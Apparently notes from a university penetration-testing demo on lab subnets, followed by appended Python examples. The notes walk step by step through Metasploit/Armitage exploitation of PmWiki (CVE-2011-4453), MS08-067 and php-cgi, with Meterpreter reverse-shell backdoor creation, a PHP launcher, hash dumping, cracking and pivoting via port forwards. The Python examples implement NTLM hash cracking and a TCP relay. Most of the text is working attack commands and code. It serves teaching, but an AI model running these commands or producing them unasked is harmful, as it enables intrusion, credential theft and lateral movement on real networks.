UoB pivoting demo
These are the notes from a quick demo I did at the University of Bedfordshire. Enjoy..
- Open Armitage
- Scan (nmap) the 172.16.128.0/24 range from Armitage and find the web server
db_nmap -sT -Pn -T5 -O --open 172.16.128.1/24
- Find attacks (Armitage: Attacks > Find Attacks)
- Visit site (http://172.16.128.3) and attack
- Exploit using CVE-2011-4453 (PmWiki pagelist.php code injection). Launching it from the GUI failed, so use the console:
use exploit/multi/http/pmwiki_pagelist
set rhost 172.16.128.3
exploit -j
sessions -v
- Check out the system (sysinfo, ps, getuid). No hashdump/winenum/route: the PHP meterpreter doesn't have the full command set, so...
- Create a backdoor: a native x64 Meterpreter executable (msfpayload has since been replaced by msfvenom, but the payload and options are the same)
msfpayload windows/x64/meterpreter/reverse_tcp LHOST=172.16.128.10 LPORT=8443 EXITFUNC=thread X > /root/Tools/runme.exe
- cat /root/Tools/meh.php
<?php
// Runs the uploaded backdoor when the page is requested; assumes runme.exe sits next to this script in the web root
system("runme.exe");
?>
- Upload both meh.php and runme.exe through the PHP meterpreter session, into the web root (the session's working directory), so the web server can serve meh.php
lcd /root/Tools
upload meh.php
upload runme.exe
- Start a listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set exitfunc thread
set lhost 172.16.128.10
set lport 8443
exploit -j
- Open a terminal and request the page; the web server runs meh.php, which starts runme.exe, and the handler catches the callback:
wget http://172.16.128.3/meh.php
- The second session is a native Meterpreter running with full system privileges
- Get hashdump
- Crack the LM/NTLM hashes with ophcrack (rainbow tables)
- Check out the second interface and routes with ipconfig/route (time to pivot!). Before the scanners and exploits below can reach 10.1.87.x, Metasploit needs a route for that subnet through this session (msfconsole route add, or Armitage's pivot setup)
- Scan the subnet with the ARP scanner post module
run arp_scanner -r 10.1.87.1/24
- Port-scan the discovered hosts with Metasploit's TCP scanner (auxiliary/scanner/portscan/tcp) through the pivot
- Locate windows server
- Locate linux server
- Compromise windows box. A bind payload is used because the target can't connect back to the attacker directly; Metasploit connects to it through the pivot session
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
set RHOST 10.1.87.4
exploit -j
- Take the hashes and crack with ophcrack
- Compromise linux box
- Create a port forward through the session to look at the internal web server from the attack box
portfwd add -l 8080 -p 80 -r 10.1.87.5
- Test the php-cgi exploit (CVE-2012-1823 argument injection) on it from the local browser: http://localhost:8080/configuration.php?-s, where -s makes a vulnerable php-cgi print the script source instead of running it
- Then check for weak SSH credentials with ssh_login:
use auxiliary/scanner/ssh/ssh_login
set USERNAME root
set PASSWORD password
set RHOSTS 10.1.87.5
run -j
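As an added example (not part of the original notes), here is what the hashdump + ophcrack steps above do under the hood: a hashdump line is `user:rid:lmhash:nthash:::`, the NT hash is MD4 over the UTF-16LE password, and cracking is just computing that for candidate passwords and looking the dump entries up. The dump lines and the wordlist are constructed for the example (the Administrator NT hash is the well-known hash of "password"); MD4 is written out because hashlib often lacks it on current OpenSSL builds.

```python
import struct

# --- MD4 (RFC 1320), written out because hashlib's md4 is missing on many OpenSSL 3 builds ---
def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)      # pad to 56 mod 64 ...
    msg += struct.pack("<Q", len(data) * 8)            # ... then the bit length, little-endian
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[j] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def ntlm(password: str) -> str:
    """NT hash = MD4 of the UTF-16LE password, hex: the 4th field of a hashdump line."""
    return md4(password.encode("utf-16-le")).hex()

# LM hash of the empty string; seeing it in the 3rd field means LM storage is disabled,
# so only the NT hash is there to crack (no 7-char LM halves for ophcrack's LM tables)
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"

def parse_hashdump(text: str):
    """Parse 'user:rid:lmhash:nthash:::' lines into dicts."""
    entries = []
    for line in text.strip().splitlines():
        parts = line.split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[:4]
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(),
                        "nt": nt.lower(), "lm_enabled": lm.lower() != LM_EMPTY})
    return entries

def crack_nt(entries, wordlist):
    """Dictionary attack: hash every candidate once (a tiny stand-in for a rainbow table),
    then look each dump entry up. Blank passwords are always tried. Uncracked -> None."""
    table = {ntlm(w): w for w in [""] + list(wordlist)}
    return {e["user"]: table.get(e["nt"]) for e in entries}

# Constructed sample dump and wordlist (not from the demo boxes); the svc_backup hash is
# generated here so the example is self-contained
SAMPLE_DUMP = "\n".join([
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:" + ntlm("Summer2012!") + ":::",
])
WORDLIST = ["123456", "password", "letmein", "Summer2012!"]

if __name__ == "__main__":
    for user, pw in crack_nt(parse_hashdump(SAMPLE_DUMP), WORDLIST).items():
        print(f"{user}: {pw!r}")
```

Ophcrack replaces the `table` dict with precomputed rainbow tables, which is why it can recover NT hashes of short passwords without a wordlist hit; the lookup idea is the same.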
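The portfwd step above (portfwd add -l 8080 -p 80 -r 10.1.87.5) is a TCP relay: a listener on the attack box, and for every connection a matching connection to the internal host, with bytes shuttled both ways. The example below, added here and not code from the notes or from Metasploit, implements that relay in Python so the mechanics are visible. Meterpreter carries the far leg over the session channel to the compromised host; this stand-in simply dials the target directly, and the "internal web server" is a constructed one-line HTTP responder on localhost rather than 10.1.87.5.

```python
import selectors
import socket
import threading

def start_fake_web_server():
    """Constructed stand-in for the internal web server; returns its ephemeral port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.settimeout(5)
                try:
                    request = conn.recv(4096)
                except OSError:
                    continue
                # echo the request line back so the caller can see the forward worked
                body = b"internal web server reached via pivot: " + request.split(b"\r\n", 1)[0]
                conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n%s" % (len(body), body))

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def _relay_pair(client, upstream):
    """Shuttle bytes in both directions until both sides have finished sending."""
    sel = selectors.DefaultSelector()
    sel.register(client, selectors.EVENT_READ, upstream)
    sel.register(upstream, selectors.EVENT_READ, client)
    open_dirs = 2
    try:
        while open_dirs:
            events = sel.select(timeout=10)
            if not events:          # idle too long: drop the pair
                break
            for key, _ in events:
                src, dst = key.fileobj, key.data
                try:
                    data = src.recv(4096)
                except OSError:
                    data = b""
                if data:
                    dst.sendall(data)
                else:               # EOF on src: pass the half-close on to dst
                    sel.unregister(src)
                    try:
                        dst.shutdown(socket.SHUT_WR)
                    except OSError:
                        pass
                    open_dirs -= 1
    finally:
        sel.close()
        client.close()
        upstream.close()

class PortForwarder:
    """Local listener that relays each connection to (remote_host, remote_port),
    i.e. the attack-box end of 'portfwd add -l <local_port> -p <remote_port> -r <remote_host>'."""
    def __init__(self, remote_host, remote_port, local_port=0):
        self.remote = (remote_host, remote_port)
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._srv.bind(("127.0.0.1", local_port))
        self._srv.listen(5)
        self.local_port = self._srv.getsockname()[1]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                client, _ = self._srv.accept()
            except OSError:
                return
            try:
                upstream = socket.create_connection(self.remote, timeout=5)
            except OSError:
                client.close()      # target unreachable: refuse this one, keep listening
                continue
            threading.Thread(target=_relay_pair, args=(client, upstream), daemon=True).start()

    def close(self):
        self._srv.close()

def http_get_via_forward(local_port, path="/"):
    """Send a GET through the local forward and return the raw response bytes."""
    with socket.create_connection(("127.0.0.1", local_port), timeout=5) as c:
        c.sendall(b"GET %s HTTP/1.0\r\nHost: 10.1.87.5\r\n\r\n" % path.encode())
        chunks = []
        while True:
            data = c.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)

def demo():
    """Forward an ephemeral local port to the stand-in server and fetch the php-cgi check URL through it."""
    target_port = start_fake_web_server()
    fwd = PortForwarder("127.0.0.1", target_port)   # stand-in for: portfwd add -l 8080 -p 80 -r 10.1.87.5
    try:
        return http_get_via_forward(fwd.local_port, "/configuration.php?-s")
    finally:
        fwd.close()

if __name__ == "__main__":
    print(demo().decode(errors="replace"))
```

Everything the browser sends to localhost:8080 reaches the internal host unchanged, which is why the `?-s` test works through the forward exactly as it would on the internal network; the difference with the real thing is only where the far-side connect happens (on the pivot host, not on the attack box).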
That's all for now..
Stay tuned :)